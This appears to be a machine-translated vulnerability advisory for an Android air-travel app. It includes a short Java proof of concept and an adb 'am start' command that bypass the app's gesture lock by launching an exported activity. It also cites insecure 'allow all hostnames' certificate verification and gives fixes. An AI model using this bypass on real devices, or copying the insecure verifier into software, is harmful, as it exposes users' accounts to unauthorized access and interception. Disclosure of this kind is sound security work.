Air travel gesture lock easily bypasses and other vulnerabilities and Solutions

Air travel gesture lock easily bypasses and other vulnerabilities and Solutions

Security functions are not properly implemented.

Test version: the latest version of the android client v2.5.5

1. In this version, you can set the gesture lock function to authenticate local users. However, this function can be easily bypassed by starting the exported activity. The POC is used as follows:

public void activityStart(View v) {ComponentName componetName = new ComponentName("com.umetrip.android.msky.app","com.umetrip.android.msky.activity.MainActivity");try {Intent intent = new Intent();intent.setComponent(componetName);startActivity(intent);} catch (Exception e) {Toast.makeText(getApplicationContext(), "Not found", 0).show();}}

Or use am directly in the adb shell for testing.

am start com.umetrip.android.msky.app/com.umetrip.android.msky.activity.MainActivity

2. decompilation finds multiple vulnerabilities that trust all certificates and are vulnerable to man-in-the-middle attacks.

1. gesture lock bypass

Under normal circumstances, you need to unlock the gesture lock and then log on
 

Start com. umetrip. android. msky. activity. MainActivity
 

shell@klte:/ $ am start com.umetrip.android.msky.app/com.umetrip.android.msky.>Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.umetrip.android.msky.app/com.umetrip.android.msky.activity.MainActivity }

Bypass the gesture lock to go to The Logon account Interface
 

2. Trust all certificates

Com. umetrip. android. msky. f. a. l Class: Use

setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER)

Trust all certificates
 

 

Solution:

1. Other activities are not exported after the default gesture lock is unlocked, or permission protection is enabled.

2, it is recommended to use setHostnameVerifier (SSLSocketFactory. STRICT_HOSTNAME_VERIFIER), see the http://www.bkjia.com/Article/201410/345896.html